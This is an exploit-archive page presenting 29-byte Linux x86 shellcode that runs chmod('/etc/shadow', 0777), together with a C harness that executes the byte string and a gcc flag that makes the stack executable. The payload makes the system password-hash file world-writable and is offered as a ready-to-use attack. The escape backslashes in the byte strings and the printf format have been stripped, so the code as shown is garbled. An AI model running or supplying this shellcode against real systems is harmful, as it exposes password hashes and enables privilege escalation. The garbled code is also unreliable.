29 bytes chmod("/etc/shadow", 0777) shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 29 bytes chmod("/etc/shadow", 0777) shellcode
# Published : 2010-04-19
# Author : Magnefikko
# Previous Title : Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded -
# Next Title : Linux/ARM - polymorphic chmod("/etc/shadow", 0777) - 84 Bytes

#include <stdio.h>
#include <string.h>

/*
by Magnefikko
20.04.2010
magnefikko@gmail.com
promhyl.oz.pl
Subgroup: #PRekambr
Name: 29 bytes chmod("/etc/shadow", 0777) shellcode
Platform: Linux x86

chmod("/etc/shadow", 0777);

gcc -Wl,-z,execstack filename.c

shellcode:

x31xc0x50x68x61x64x6fx77x68x63x2fx73x68x68x2fx2fx65x74x89xe3x66x68xffx01x59xb0x0fxcdx80

*/


int main(){
char shell[] =
"x31xc0x50x68x61x64x6fx77x68x63x2fx73x68x68x2fx2fx65x74x89xe3x66x68xffx01x59xb0x0fxcdx80";
printf("by Magnefikkonmagnefikko@gmail.comnpromhyl.oz.plnnstrlen(shell)
= %dn", strlen(shell));
(*(void (*)()) shell)();
}